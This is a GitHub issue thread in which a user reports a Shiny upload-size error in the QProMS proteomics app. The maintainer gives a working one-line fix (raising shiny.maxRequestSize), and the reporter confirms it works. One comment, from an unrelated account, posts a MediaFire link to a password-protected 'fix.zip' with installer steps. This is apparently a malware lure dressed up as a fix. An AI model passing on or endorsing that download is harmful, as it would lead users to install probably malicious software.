### ISSUE TITLE
maximum upload size exceeded

### ISSUE THREAD

**Issue by grandrea** [FabioBedin/QProMS#1]
Ciao Fabio, 
I installed this version with renv::restore() and managed to run with shiny::runApp().

However, when I try to upload a proteinGroups file in the browser, I get "maximum upload size exceeded". any clues?

![image](https://github.com/user-attachments/assets/77f4ee8e-6e61-43df-8a72-514a9106783f)

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by FabioBedin** [comment]
Ciao Andrea,

in this version I had not yet changed the upload limit for Shiny, but nothing could be simpler: if you open the file main.R and inside the server function add the following line of code "options(shiny.maxRequestSize=10000*1024^2)" you should be able to upload your file. In any case, I will fix this problem myself with the next update.

**Comment by grandrea** [comment]
works thank you
